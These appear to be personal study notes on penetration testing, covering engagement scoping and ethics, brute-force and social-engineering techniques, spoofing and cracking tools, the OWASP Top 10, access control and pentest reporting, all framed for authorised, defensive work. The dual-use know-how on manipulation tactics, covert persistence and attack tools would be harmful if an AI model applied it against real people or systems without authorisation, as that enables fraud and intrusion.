The pen tester will attempt to gain access to a target system and sniff network traffic, using various methods to exploit the system including:

launching an exploit with a payload onto the system
breaching physical barriers to assets
social engineering
exploiting website vulnerabilities
exploiting software and hardware vulnerabilities or misconfigurations
breaching access controls security
cracking weak encrypted Wi-Fi. This stage involves leveraging vulnerabilities discovered on a system or application. This stage can involve the use of public exploits or exploiting application logic.

Step 4: Maintaining access

The pen tester will maintain access to the target to find out what data and systems are vulnerable to exploitation. It is important that they remain undetected, typically using backdoors, Trojan horses, rootkits and other covert channels to hide their presence. When this infrastructure is in place, the pen tester will then proceed to gather the data that they consider valuable.

Privilege Escalation

Once you have successfully exploited a system or application (known as a foothold), this stage is the attempt to expand your access to a system. You can escalate horizontally and vertically, where horizontally is accessing another account of the same permission group (i.e. another user), whereas vertically is that of another permission group (i.e. an administrator).

Step 5: Post-exploitation

This stage involves a few sub-stages:
1. What other hosts can be targeted (pivoting) 2. What additional information can we gather from the host now that we are a privileged user 3. Covering your tracks 4. Reporting

Step 6: Analysis and reporting

The pen tester will provide feedback via a report that recommends updates to products, policies and training to improve an organization’s security.

Planning and scoping a pentest

[[Security Frameworks]]

[[Legal Concepts]]

Local Restrictions

Know the Law: Penetration testing laws vary by country. Violating them—even unintentionally—can lead to legal consequences (e.g., Computer Fraud and Abuse Act, USA). Always confirm local and international laws before testing.
Get Written Permission: Always have clear, written authorization from the client. This protects you legally and guides your scope of work (SOW).
Identify Pre-engagement Constraints:
- Tool and technique restrictions
- Business/tech limitations
- Areas/systems off-limits (e.g., live production databases)
- Limits due to skill sets or known exploits
Communicate Clearly: Discuss any limitations with stakeholders early and throughout the engagement.
Respect Privacy Laws: Be aware of regulations like GDPR and CCPA that may impact how data can be accessed or handled.
Check Corporate Policies: Clients may have internal rules or regulatory obligations that define how testing must be done. Always ask and document.

Rules of Engagement

The rules of engagement document specifies the conditions under which the security penetration testing engagement will be conducted. You need to document and agree upon these rule of engagement conditions with the client or an appropriate stakeholder. Sample Elements of a Rules of Engagement Document

| Rule of Engagement Element | Example | | ---------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Testing timeline | Three weeks, as specified in a Gantt chart | | Location of the testing | Company’s headquarters in Raleigh, North Carolina | | Time window of the testing (times of day) | 9:00 a.m. to 5:00 p.m. EST | | Preferred method of communication | Final report and weekly status update meetings | | The security controls that could potentially detect or prevent testing | Intrusion prevention systems (IPSs), firewalls, data loss prevention (DLP) systems | | IP addresses or networks from which testing will originate | 10.10.1.0/24, 192.168.66.66, 10.20.15.123 | | Types of allowed or disallowed tests | Testing only web applications (app1.secretcorp.org and app2.secretcorp.org). No social engineering attacks are allowed. No SQL injection attacks are allowed in the production environment. SQL injection is only allowed in the development and staging environments at: app1-dev.secretcorp.org app1-stage.secretcorp.org app2-dev.secretcorp.org app2-stage.secretcorp.org | Gantt charts and work breakdown structures (WBS) can be used as tools to demonstrate and document the timeline.

Target List and In-Scope Assets

Scoping is one of the most important elements of the pre-engagement tasks with any penetration testing engagement. You not only have to carefully identify and document all systems, applications, and networks that will be tested but also determine any specific requirements and qualifications needed to perform the test. The broader the scope of the penetration testing engagement, the more skills and requirements that will be needed. Your scope and related documentation must include information about what types of networks will be tested, like the IP address ranges of the devices and assets that the penetration tester is allowed to assess. In addition to IP ranges, you must document any wireless networks or service set identifiers (SSIDs) that you are allowed or not allowed to test.

You may also be hired to perform an assessment of modern applications using different application programming interfaces (APIs). In this case the client may provide [[API]] Documentation.

Additional resources that may be provided:

Software development kit (SDK) for specific applications An SDK, or devkit, is a collection of software development tools that can be used to interact and deploy a software framework, an operating system, or a hardware platform. SDKs can also help pen testers understand certain specialized applications and hardware platforms within the organization being tested.
Source code access Some organizations may allow you to obtain access to the source code of applications to be tested.
Examples of application requests In most cases, you will be able to reveal context by using web application testing tools such as proxies like the Burp Suite and the OWASP Zed Attack Proxy (ZAP). You will learn more about these tools in Module 6, “Exploiting Application-Based Vulnerabilities,” and Module 10, “Tools and Code Analysis.”
System and network architectural diagrams These documents can be very beneficial for penetration testers, and they can be used to document and define what systems are in scope during the testing.

It is very important to document the physical location where the penetration testing will be done, as well as the Domain Name System (DNS) fully qualified domain names (FQDNs) of the applications and assets that are allowed (including any subdomains). You must also agree and understand if you will be allowed to demonstrate how an external attacker could compromise your systems or how an insider could compromise internal assets. This external vs. internal target identification and scope should be clearly documented.

Scope creep is a project management term that refers to the uncontrolled growth of a project’s scope. It is also often referred to as kitchen sink syndrome, requirement creep, and function creep. Scope creep can put you out of business. Many security firms suffer from scope creep and are unsuccessful because they have no idea how to identify when the problem starts or how to react to it.

Validating the Scope of Engagement

The first step in validating the scope of an engagement is to question the client and review contracts. You must also understand who the target audience is for your penetration testing report. You should understand the subjects, business units, and any other entity that will be assessed by such a penetration testing engagement.

Answering the following questions will help discover different characteristics of your target audience.

What is the entity’s or individual’s need for the report?
What is the position of the individual who will be the primary recipient of the report within the organization?
What is the main purpose and goal of the penetration testing engagement and ultimately the purpose of the report?
What is the individual’s or business unit’s responsibility and authority to make decisions based on your findings?
Who will the report be addressed to–for example, the information security manager (ISM), chief information security officer (CISO), chief information officer (CIO), chief technical officer (CTO), technical teams, and so on?
Who will have access to the report, which may contain sensitive information that should be protected, and whether access will be provided on a need-to-know basis? You should have proper documentation of answers to the following questions.
What is the contact information for all relevant stakeholders?
How will you communicate with the stakeholders?
How often do you need to interact with the stakeholders?
Who are the individuals you can contact at any time if an emergency arises?

You should ask for a form of secure bulk data transfer or storage, such as Secure Copy Protocol (SCP) or Secure File Transfer Protocol (SFTP). You should also exchange any Pretty Good Privacy (PGP) keys or Secure/Multipurpose Internet Mail Extensions (S/MIME) keys for encrypted email exchanges.

Questions about budget and return on investment (ROI) may arise from both the client side and the tester sides in penetration testing. Clients may ask questions like these.

How do I explain the overall cost of penetration testing to my boss?
Why do we need penetration testing if we have all these security technical and nontechnical controls in place?
How do I build in penetration testing as a success factor?
Can I do it myself?
How do I calculate the ROI for the penetration testing engagement? At the same time, the tester needs to answer questions like these.
How do I account for all items of the penetration testing engagement to avoid going over budget?
How do I do pricing?
How can I clearly show ROI to my client?
The answers to these questions depend on how effective you are at scoping and clearly communicating and understanding all the elements of the penetration testing engagement. Another factor is understanding that penetration testing is a point-in-time assessment.

It is important for both the client and the pen tester to comprehend that penetration testing alone cannot guarantee the overall security of the company. The pen tester also needs to incorporate clear and achievable mitigation strategies for the vulnerabilities found. In addition, an appropriate impact analysis and remediation timelines must be discussed with the respective stakeholders.

Pre-Engagement Scope and Planning

Review Client Needs: Start by analyzing the client's initial request to understand their objectives.
Conduct Clarification Meeting: Meet with the client to refine goals and suggest additional testing aspects they may have missed.
Define Scope: Clearly outline which systems, applications, and personnel are included or excluded from testing.
Address Compliance: Identify relevant compliance requirements to be evaluated during the engagement.
Confirm Provided Information: Determine what access and details the client will share about their network, systems, and facilities.
Establish Rules of Engagement: Finalize the scope, terms, and conditions to ensure mutual understanding before the engagement begins.

Create a Pentesting Agreement

A penetration testing agreement is a legally-binding contract between the client or customer, and the penetration tester. The agreement defines all the terms and conditions required for the penetration testing exercise. The agreement will include elements that are mutually agreed upon by both parties. It may contain things, such as the date for the commencement of pentesting, the scope of work, the service-level agreement, the potential pentesting completion date, the project timeline, costs and payment details etc. Also included in the contract will be other terms and conditions as well as pricing details. Contracts usually do not stipulate the personnel who are conducting the test, but they will include the relevant signatories at the company performing the test. This is usually a member, or members, of the management team. Vulnerabilities are not reported at this time because the test has not yet been conducted.

Ethics

Hacking is illegal. Ethical hacking is the use of otherwise illegal tools and techniques for legal purposes. It is ethics that differentiate the two. There are several approaches or perspectives on ethical decision making, including utilitarian ethics, the rights approach, and the common good approach. Other ethical decision models include the fairness or justice approach as well as the virtue approach.

Information stored on the computer should be treated as seriously as written or spoken words.
Respect the privacy of others.
Creation and usage of malware is illegal and must not be practiced.
Should not prevent others from accessing public information.
Overwhelming other’s system with unwanted information is unethical.
Sending inappropriate messages through email or chat is forbidden.
Do no harm with a computer.
Comply with legal standards.
Be trustworthy.
Maintain confidentiality.

| scenarios in which an ethical hacker (penetration tester) should demonstrate professionalism and integrity | | --------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------- | | background checks of penetration testing teams | Check the credentials and skills of the individuals performing the penetration test. | | adherence to the specific scope of engagement | Create a list of applications, systems, or networks to be tested. | | Limiting invasiveness based on scope | Specify tools and attacks that could be detrimental and disruptive for your client’s systems. | | Limiting the use of tools used in a particular penetration test | Specifying the allowed, or disallowed, testing tools. | | Identification and immediate reporting of criminal activity | Report evidence of any system or network that was previously compromised. |

[Vault: Vulns & Attacks] Brute force attacks

Sun, 07 Dec 2025 05:23:47 GMT

Brute force attacks

A brute force attack is a trial-and-error process of discovering private information. There are different types of brute force attacks that malicious actors use to guess passwords, including:

Simple brute force attacks. When attackers try to guess a user's login credentials, it’s considered a simple brute force attack. They might do this by entering any combination of usernames and passwords that they can think of until they find the one that works.
Dictionary attacks use a similar technique. In dictionary attacks, attackers use a list of commonly used passwords and stolen credentials from previous breaches to access a system. These are called “dictionary” attacks because attackers originally used a list of words from the dictionary to guess the passwords, before complex password rules became a common security practice.
Reverse brute force attacks are similar to dictionary attacks, except they start with a single credential and try it in various systems until a match is found.
Credential stuffing is a tactic in which attackers use stolen login credentials from previous data breaches to access user accounts at another organization. A specialized type of credential stuffing is called pass the hash. These attacks reuse stolen, unsalted hashed credentials to trick an authentication system into creating a new authenticated user session on the network.

Using brute force to access a system can be a tedious and time consuming process, especially when it’s done manually. There are a range of tools attackers use to conduct their attacks.

Assessing vulnerabilities

Before a brute force attack or other cybersecurity incident occurs, companies can run a series of tests on their network or web applications to assess vulnerabilities. Analysts can use virtual machines and sandboxes to test suspicious files, check for vulnerabilities before an event occurs, or to simulate a cybersecurity incident.

Tools

Aircrack-ng
Hashcat
John the Ripper
Ophcrack
THC Hydra

Prevention measures

Some common measures organizations use to prevent brute force attacks and similar attacks from occurring include:

Salting and hashing: Hashing converts information into a unique value that can then be used to determine its integrity. It is a one-way function, meaning it is impossible to decrypt and obtain the original text. Salting adds random characters to hashed passwords. This increases the length and complexity of hash values, making them more secure.
Multi-factor authentication (MFA) and two-factor authentication (2FA): MFA is a security measure which requires a user to verify their identity in two or more ways to access a system or network. This verification happens using a combination of authentication factors: a username and password, fingerprints, facial recognition, or a one-time password (OTP) sent to a phone number or email. 2FA is similar to MFA, except it uses only two forms of verification.
CAPTCHA and reCAPTCHA: CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. It asks users to complete a simple test that proves they are human. This helps prevent software from trying to brute force a password. reCAPTCHA is a free CAPTCHA service from Google that helps protect websites from bots and malicious software.
Password policies: Organizations use password policies to standardize good password practices throughout the business. Policies can include guidelines on how complex a password should be, how often users need to update passwords, whether passwords can be reused or not, and if there are limits to how many times a user can attempt to log in before their account is suspended.

[Vault: Vulns & Attacks] Social Engineering

Sun, 07 Dec 2025 05:23:47 GMT

Social Engineering

Social engineering is a manipulation technique that exploits human error to gain private information, access, or valuables. Social engineering is the manipulation of people into performing actions or divulging confidential information. Social engineers often rely on people’s willingness to be helpful, but they also prey on their weaknesses. For example, an attacker will call an authorized employee with an urgent problem that requires immediate network access and appeal to the employee’s vanity or greed or invoke authority by using name-dropping techniques in order to gain this access. Social engineering attacks are related to the security and risk management domain.

Phishing

With phishing, an attacker presents to a user a link or an attachment that looks like a valid, trusted resource. When the user clicks it, he or she is prompted to disclose confidential information such as his or her username and password

Phishing kits typically contain tools such as malicious attachments, fake data-collection forms, and fraudulent web links in order to help attackers avoid detection.

Spear phishing

A malicious email attack that targets a specific user or group of users. The email seems to originate from a trusted source. The attacker studies a victim and the victim’s organization in order to be able to make emails look legitimate and perhaps make them appear to come from trusted users within the company.

Whaling

A form of spear phishing. Threat actors target high-profile business executives or key individuals in a company to gain access to sensitive data.

Vishing:

Vishing (which is short for voice phishing) is a social engineering attack carried out in a phone conversation. The attacker persuades the user to reveal private personal and financial information or information about another person or a company. The attackers exploit electronic voice communication to obtain sensitive information or to impersonate a known source. Attackers may impersonate and spoof caller ID to hide themselves when performing vishing attacks.

Smishing:

The use of text messages to trick users, in order to obtain sensitive information or to impersonate a known source.

Business Email Compromise (BEC)

A threat actor sends an email message that seems to be from a known source to make a seemingly legitimate request for information, in order to obtain a financial advantage.

Social media phishing

Physical social engineering

USB (Universal Serial Bus) baiting

Many pen testers and attackers have used Universal Serial Bus (USB) drop key attacks to successfully compromise victim systems. This type of attack involves just leaving USB sticks (sometimes referred to as USB keys or USB pen drives) unattended or placing them in strategic locations. Oftentimes, users think that the devices are lost and insert them into their systems to figure out whom to return the devices to; before they know it, they are downloading and installing malware. Plugging in that USB stick you found lying around on the street outside your office could lead to a security breach.

Watering hole attack

A watering hole attack is a targeted attack that occurs when an attacker profiles websites that the intended victim accesses. The attacker then scans those websites for possible vulnerabilities. If the attacker locates a website that can be compromised, the website is then injected with a JavaScript or other similar code injection that is designed to redirect the user when the user returns to that site. (This redirection is also known as a pivot attack.) The user is then redirected to a site with some sort of exploit code. The purpose is to infect computers in the organization’s network, thereby allowing the attacker to gain a foothold in the network for espionage or other reasons. Watering hole attacks are often designed to profile users of specific organizations. Organizations should therefore develop policies to prevent these attacks. Such a policy might, for example, require updating anti-malware applications regularly and using secure virtual browsers that have little connectivity to the rest of the system and the rest of the network. To avoid having a website compromised as part of such an attack, an administrator should use proper programming methods and scan the organization’s website for malware regularly. User education is paramount to help prevent these types of attacks.

Pretexting

With pretexting, or impersonation, an attacker presents as someone else in order to gain access to information. In some cases, it can be very simple, such as quickly pretending to be someone else within an organization; in other cases, it can involve creating a whole new identity and then using that identity to manipulate the receipt of information. Social engineers may use pretexting to impersonate individuals in certain jobs and roles even if they do not have experience in those jobs or roles.

Elicitation is the act of gaining knowledge or information from people. In most cases, an attacker gets information from a victim without directly asking for that particular information. Pharming is a type of impersonation attack in which a threat actor redirects a victim from a valid website or resource to a malicious one that could be made to appear as the valid site to the user. From there, an attempt is made to extract confidential information from the user or to install malware in the victim’s system. Pharming can be done by altering the host file on a victim’s system, through DNS poisoning, or by exploiting a vulnerability in a DNS server. An attack that is similar to pharming is called malvertising. Malvertising involves incorporating malicious ads on trusted websites. Users who click these ads are inadvertently redirected to sites hosting malware.

Physical Attacks

Baiting

social engineering tactic that tempts people into compromising their security. A common example is USB baiting that relies on someone finding an infected USB drive and plugging it into their device.

Tailgating

With piggybacking, an unauthorized person tags along with an authorized person to gain entry to a restricted area – usually with the person’s consent. Tailgating is essentially the same but with one difference: It usually occurs without the authorized person’s consent. Both piggybacking and tailgating can be defeated through the use of access control vestibules (formerly known as mantraps). An access control vestibule is a small space that can usually fit only one person. It has two sets of closely spaced doors; the first set must be closed before the other will open, creating a sort of waiting room where people are identified (and cannot escape). Access control vestibules are often used in server rooms and data centers. Multifactor authentication is often used in conjunction with an access control vestibule; for example, a proximity card and PIN may be required at the first door and a biometric scan at the second.

Dumpster Diving

With Dumpster diving, a person scavenges for private information in garbage and recycling containers. To protect sensitive documents, an organization should store them in a safe place as long as possible. When it no longer needs the documents, the organization should shred them. (Some organizations incinerate their documents or have them shredded by a certified professional third party.) Dumpster divers might find information on paper and on hard drives or removable media.

Shoulder Surfing

With shoulder surfing, someone obtains information such as personally identifiable information (PII), passwords, and other confidential data by looking over a victim’s shoulder. One way to do this is to get close to a person and look over his or her shoulder to see what the person is typing on a laptop, phone, or tablet. It is also possible to carry out this type of attack from far away by using binoculars or even a telescope. These attacks tend to be especially successful in crowded places. In addition, shoulder surfing can be accomplished with small hidden cameras and microphones. User awareness and training are key to prevention. There are also special screen filters for computer displays to prevent someone from seeing the screen at an angle.

Badge Cloning

Attackers can perform different badge cloning attacks. For example, an attacker can clone a badge/card used to access a building. Specialized software and hardware can be used to perform these cloning attacks. Attackers can also use social engineering techniques to impersonate employees or any other authorized users to enter a building by just creating their own badge and attempting to trick other users into letting them into a building. This could even be done without a full clone of the radio frequency (RF) capabilities of a badge.

Methods of Influence

Authority A social engineer shows confidence and perhaps authority–whether legal, organizational, or social authority.
Scarcity and Urgency It is possible to use scarcity to create a feeling of urgency in a decision-making context. Specific language can be used to heighten urgency and manipulate the victim. Salespeople often use scarcity to manipulate clients (for example, telling a customer that an offer is only for today or that there are limited supplies). Social engineers use similar techniques.
Social Proof Social proof is a psychological phenomenon in which an individual is not able to determine the appropriate mode of behavior. For example, you might see others acting or doing something in a certain way and might assume that it is appropriate. Social engineers may take advantage of social proof when an individual enters an unfamiliar situation that he or she doesn’t know how to deal with. Social engineers may manipulate multiple people at once by using this technique.
Likeness Individuals can be influenced by things or people they like. Social engineers strive for others to like the way they behave, look, and talk. Most individuals like what is aesthetically pleasing. People also like to be appreciated and to talk about themselves. Social engineers take advantage of these human vulnerabilities to manipulate their victims.
Fear It is possible to manipulate a person with fear to prompt him or her to act promptly. Fear is an unpleasant emotion based on the belief that something bad or dangerous may take place. Using fear, social engineers force their victims to act quickly to avoid or rectify a dangerous or painful situation.

Social Engineering Tools

[[Social-Engineer Toolkit (SET)|Social-Engineer Toolkit (SET)]]

[[Browser Exploitation Framework|Browser Exploitation Framework (BeEF)]]

Call Spoofing Tools

You can very easily change the caller ID information that is displayed on a phone. There are several call spoofing tools that can be used in social engineering attacks.

The following are a few examples of call spoofing tools:

SpoofApp: This is an Apple iOS and Android app that can be used to easily spoof a phone number.
SpoofCard: This is an Apple iOS and Android app that can spoof a number and change your voice, record calls, generate different background noises, and send calls straight to voicemail.
Asterisk: Asterisk is a legitimate voice over IP (VoIP) management tool that can also be used to impersonate caller ID.
Phishing.org reports on the latest phishing trends and shares free resources that can help reduce phishing attacks.
The Anti-Phishing Working Group (APWG) is a non-profit group of multidisciplinary security experts that publishes a quarterly report on phishing trends.
OUCH! is a free monthly newsletter from the SANS Institute that reports on social engineering trends and other security topics.
Scamwatch is a resource for news and tools for recognizing, avoiding, and reporting social engineering scams.

[Vault: Web Security] OWASP Top 10

Sun, 07 Dec 2025 05:23:47 GMT

The Open Web Application Security Project (OWASP) is an international organization dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems. There are dozens of OWASP chapters around the world. It is recommended that you become familiar with OWASP’s website (https://www.owasp.org) and guidance.

OWASP publishes and regularly updates a list of the top 10 application security risks. The OWASP Top 10 is an awareness document and a community effort (see https://owasp.org/www-project-top-ten/). You can also contribute and review via the OWASP GitHub repository at https://github.com/OWASP/Top10.

Common vulnerabilities

Businesses often make critical security decisions based on the vulnerabilities listed in the OWASP Top 10. This resource influences how businesses design new software that will be on their network, unlike the CVE® list, which helps them identify improvements to existing programs. These are the most regularly listed vulnerabilities that appear in their rankings to know about:

Broken access control

Access controls limit what users can do in a web application. For example, a blog might allow visitors to post comments on a recent article but restricts them from deleting the article entirely. Failures in these mechanisms can lead to unauthorized information disclosure, modification, or destruction. They can also give someone unauthorized access to other business applications.

Cryptographic failures

Information is one of the most important assets businesses need to protect. Privacy laws such as General Data Protection Regulation (GDPR) require sensitive data to be protected by effective encryption methods. Vulnerabilities can occur when businesses fail to encrypt things like personally identifiable information (PII). For example, if a web application uses a weak hashing algorithm, like MD5, it’s more at risk of suffering a data breach.

Injection

Injection occurs when malicious code is inserted into a vulnerable application. Although the app appears to work normally, it does things that it wasn’t intended to do. Injection attacks can give threat actors a backdoor into an organization’s information system. A common target is a website’s login form. When these forms are vulnerable to injection, attackers can insert malicious code that gives them access to modify or steal user credentials.

Insecure design

Applications should be designed in such a way that makes them resilient to attack. When they aren’t, they’re much more vulnerable to threats like injection attacks or malware infections. Insecure design refers to a wide range of missing or poorly implemented security controls that should have been programmed into an application when it was being developed.

Security misconfiguration

Misconfigurations occur when security settings aren’t properly set or maintained. Companies use a variety of different interconnected systems. Mistakes often happen when those systems aren’t properly set up or audited. A common example is when businesses deploy equipment, like a network server, using default settings. This can lead businesses to use settings that fail to address the organization's security objectives.

Vulnerable and outdated components

Vulnerable and outdated components is a category that mainly relates to application development. Instead of coding everything from scratch, most developers use open-source libraries to complete their projects faster and easier. This publicly available software is maintained by communities of programmers on a volunteer basis. Applications that use vulnerable components that have not been maintained are at greater risk of being exploited by threat actors.

Identification and authentication failures

Identification is the keyword in this vulnerability category. When applications fail to recognize who should have access and what they’re authorized to do, it can lead to serious problems. For example, a home Wi-Fi router normally uses a simple login form to keep unwanted guests off the network. If this defense fails, an attacker can invade the homeowner’s privacy.

Software and data integrity failures

Software and data integrity failures are instances when updates or patches are inadequately reviewed before implementation. Attackers might exploit these weaknesses to deliver malicious software. When that occurs, there can be serious downstream effects. Third parties are likely to become infected if a single system is compromised, an event known as a supply chain attack. A famous example of a supply chain attack is the SolarWinds cyber attack (2020) where hackers injected malicious code into software updates that the company unknowingly released to their customers.

Security logging and monitoring failures

In security, it’s important to be able to log and trace back events. Having a record of events like user login attempts is critical to finding and fixing problems. Sufficient monitoring and incident response is equally important.

Server-side request forgery

Companies have public and private information stored on web servers. When you use a hyperlink or click a button on a website, a request is sent to a server that should validate who you are, fetch the appropriate data, and then return it to you. Server-side request forgeries (SSRFs) are when attackers manipulate the normal operations of a server to read or update other resources on that server. These are possible when an application on the server is vulnerable. Malicious code can be carried by the vulnerable app to the host server that will fetch unauthorized data.

[Vault: GRC] Access Control

Sat, 06 Dec 2025 14:43:43 GMT

Access Controls are security controls that manage access，authorization, and accountability of information.

AAA framework

Authentication
Authorization
Audit (Accounting) Authentication is concerned with proving identity, authorization with granting permissions, accounting with maintaining a continuous and robust audit trail via logging.

Authentication

The process of verifying that a user is who they claim to be.
This typically involves requiring a user to provide credentials like a username and password, a multi-factor authentication method, or a biometric scan. Factors:

Knowledge: something the user knows
Ownership: something the user possesses
Characteristic: something the user is

[[SSO]]

Authorization

The process of managing what an authenticated user is allowed to access and do on a network.
Once a user is authenticated, authorization checks their permissions to see which resources, services, or data they can interact with. Authorization controls are linked to two security principles: Principle of least privilege & separation of duties.
PoLP, or the Principle of Least Privilege, is the principle that users, systems, and applications are granted only the minimum necessary access rights to perform their authorized functions.
Separation of duties is the principle that users should not be given levels of authorization that would allow them to misuse a system.

Accounting

The process of tracking and logging user activities on the network.
This involves collecting data on what users do, such as which resources they access, when they access them, and how long they use them. This information is vital for monitoring, auditing, and security analysis.

IAM

Identity and access management (IAM) is a collection of processes and technologies that helps organizations manage digital identities in their environment. Both AAA and IAM systems are designed to authenticate users, determine their access privileges, and track their activities within a system.

Either model used by your organization is more than a single, clearly defined system. They each consist of a collection of security controls that ensure the right user is granted access to the right resources at the right time and for the right reasons. Each of those four factors is determined by your organization's policies and processes.

Access Control Frameworks

Mandatory Access Control (MAC)

Authorization in this model is based on a strict need-to-know basis. Access to information must be granted manually by a central authority or system administrator. For example, MAC is commonly applied in law enforcement, military, and other government agencies where users must request access through a chain of command. MAC is also known as non-discretionary control because access isn’t given at the discretion of the data owner.

Discretionary Access Control (DAC)

DAC is typically applied when a data owner decides appropriate levels of access. One example of DAC is when the owner of a Google Drive folder shares editor, viewer, or commentor access with someone else.

Role-Based Access Control (RBAC)

RBAC is used when authorization is determined by a user's role within an organization. For example, a user in the marketing department may have access to user analytics but not network administration.

Attribute Based Access Control (ABAC)

A dynamic access control model where permissions are determined by the characteristics of the user, resource, and environment. Examples of attributes include a user's job title or department, the sensitivity of a file, or the time of day and location of an access attempt. It offers more fine-grained and flexible control compared to older models like Role-Based Access Control (RBAC).

IDPro© is a professional organization dedicated to sharing essential IAM industry knowledge.

[Vault: GRC] SSO

Sat, 06 Dec 2025 14:43:43 GMT

Single sign-on (SSO) is a technology that combines several different logins into one.

SSO improves the user experience by eliminating the number of usernames and passwords people have to remember.
Companies can lower costs by streamlining how they manage connected services.
SSO improves overall security by reducing the number of access points attackers can target.

How SSO works

SSO works by automating how trust is established between a user and a service provider. Rather than placing the responsibility on an employee or customer, SSO solutions use trusted third-parties to prove that a user is who they claim to be. This is done through the exchange of encrypted access tokens between the identity provider and the service provider.

Similar to other kinds of digital information, these access tokens are exchanged using specific protocols. SSO implementations commonly rely on two different authentication protocols: LDAP and SAML. LDAP, which stands for Lightweight Directory Access Protocol, is mostly used to transmit information on-premises; SAML, which stands for Security Assertion Markup Language, is mostly used to transmit information off-premises, like in the cloud.

Note: LDAP and SAML protocols are often used together.

Here's an example of how SSO can connect a user to multiple applications with one access token: ![[attachments/SSO-1764864850878.png]]

Limitations of SSO

Usernames and passwords alone are not always the most secure way of protecting sensitive information. SSO provides useful benefits, but there’s still the risk associated with using one form of authentication. For example, a lost or stolen password could expose information across multiple services. Thankfully, there’s a solution to this problem.

[Vault: GRC] CIA Triad

Thu, 04 Dec 2025 15:25:37 GMT

CIA triad

CIA stands for confidentiality, integrity, and availability. It is a model that helps inform how organizations consider risk when setting up systems and security policies.

Confidentiality means that only authorized users can access specific assets or data. For example, strict access controls that define who should and should not have access to data, must be put in place to ensure confidential data remains safe.
Integrity means the data is correct, authentic, and reliable. To maintain integrity, security professionals can use a form of data protection like encryption to safeguard data from being tampered with.
Availability means data is accessible to those who are authorized to access it. ![[attachments/Pasted-image-20240628204323.png|728x402]]

[Vault: Offensive Security] Reporting

Thu, 04 Dec 2025 15:25:37 GMT

Upon concluding any penetration test, the transition from execution to reporting hinges entirely on the quality of your documentation. Every action taken during the test, and every result unearthed, contributes to the final report that will be presented to the client. It's imperative that each finding is meticulously recorded, along with the precise methodology used to obtain it. This rigorous approach to note-keeping and documentation management isn't merely administrative overhead; it's the bedrock upon which you communicate the immense effort invested and the value delivered. Without comprehensive, well-organized data, effectively reporting on your hard work becomes a significant challenge. The immersive nature of penetration testing can often lead to oversight in real-time note-taking, making a conscious commitment to continuous documentation absolutely essential.

Even after the technical execution of a penetration test is complete, the most critical phase delivering a quality report awaits. Whether you're an internal team member or a contracted cybersecurity professional, this report is your primary deliverable and directly enables your client to understand and mitigate the vulnerabilities you've uncovered. This final stage encompasses several key activities:

Post-Engagement Cleanup: Begin by thoroughly removing any tools, scripts, or shells that were deployed on the tested systems. This ensures the environment is returned to its original state and maintains the integrity of the client's systems.
Report Writing Best Practices: Crafting an effective report is paramount. This involves adhering to best practices for structure and content, including common report elements like an executive summary, detailed findings, and clear recommendations.
Effective Communication: Finally, proper report handling and communication best practices are essential. This ensures the findings are presented clearly, professionally, and in a way that empowers the client to take decisive action.

Report Writing

Recommendations for remediation should be clear to both executives and technical staff
Report should highlight both non- technical (executive) and technical findings
A report is typically delivered within a week after the engagement ends

Debrief

A debrief walks through your report findings. This can be with technical and non- technical staff present.
It gives an opportunity for the client to ask questions and address any concerns before a final report is released.

Effective Penetration Test Reporting

Communication as Key

Reports are a form of communication. Just like speaking, effective reports require tailoring language and content to the audience. Be clear and concise for busy people, simplify for less technical readers, and always maintain a respectful, professional tone, avoiding criticism or condescension. This blend of practice and thoughtful consideration makes report writing an art.

Audience-Centric Reporting

A crucial aspect of reporting is knowing your audience. A report understood only by highly technical staff will miss its mark with non-technical stakeholders like the C-suite. The executive summary is vital here, translating complex technical findings into easily understandable summaries for all technical levels. Remember, your report will likely be passed to various technical teams (IT, InfoSec, Developers), so the detailed sections must provide enough information for them to take action.

Beyond Automated Outputs

While penetration testing tools often generate impressive reports, resist simply regurgitating their output. Tools can produce false positives or negatives. You must critically review the results, analyze their meaning in the context of the target's business, and determine the actual impact. This in-depth analysis is essential for compiling a prioritized plan to address the findings effectively

Report Contents

There are many ways you can go about structuring the elements in a report. Most penetration testing consultants start with a template and customize it based on the type of test and the desired deliverable. Keep in mind that there are published standards that you can reference. TIP Take some time to look at the excellent examples of penetration testing reports available at https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/pen_testing_reports. These reports have been provided by various organizations for the purpose of sharing examples of penetration testing reports. A great way to use this resource is to browse through the sample reports and view the report formats. A penetration testing report typically contains the following sections (which are not listed in a particular order). Select each for more detail. Executive Summary A brief high-level summary describes the penetration test scope and major findings. Scope Details It is important to include a detailed definition of the scope of the network and systems tested as part of the engagement to distinguish between in-scope and out-of-scope systems or segments and identify critical systems that are in or out of scope and explain why they are included in the test as targets. Methodology A report should provide details on the methodologies used to complete the testing (for example, port scanning, Nmap). You should also include details about the attack narrative. For example, if the environment did not have active services, explain what testing was performed to verify restricted access. Document any issues encountered during testing (for example, interference encountered as a result of active protection systems blocking traffic). Findings A report should document technical details about whether or how the system under testing and related components may be exploited based on each vulnerability found. It is a good idea to use an industry-accepted risk ratings for each vulnerability, such as the Common Vulnerability Scoring System (CVSS). When it comes to reporting, it can be difficult to determine a relevant method of calculating metrics and measures of the findings uncovered in the testing phases. This information is very important in your presentation to management. You must be able to provide data to show the value in your effort. This is why you should always try to use an industry-standard method for calculating and documenting the risks of the vulnerabilities listed in your report. CVSS has been adopted by many tools, vendors, and organizations. Using an industry standard such as CVSS will increase the value of your report to your client. CVSS, which was developed and is maintained by FIRST.org, provides a method for calculating a score for the seriousness of a threat. The scores are rated from 0 to 10, with 10 being the most severe. CVSS uses three metric groups in determining scores.

[[CVE, CWE, CVSS]] Remediation You should provide clear guidance on how to mitigate and remediate each vulnerability. This information will be very useful for the IT technical staff, software developers, and security analysts who are trying to protect the organization (often referred to as the “blue team”). Conclusion The report must have a good summary of all the findings and recommendations. Appendix It is important to document any references and include a glossary of terms that the audience of the report may not be familiar with.

Storage Time for Report and Secure Distribution

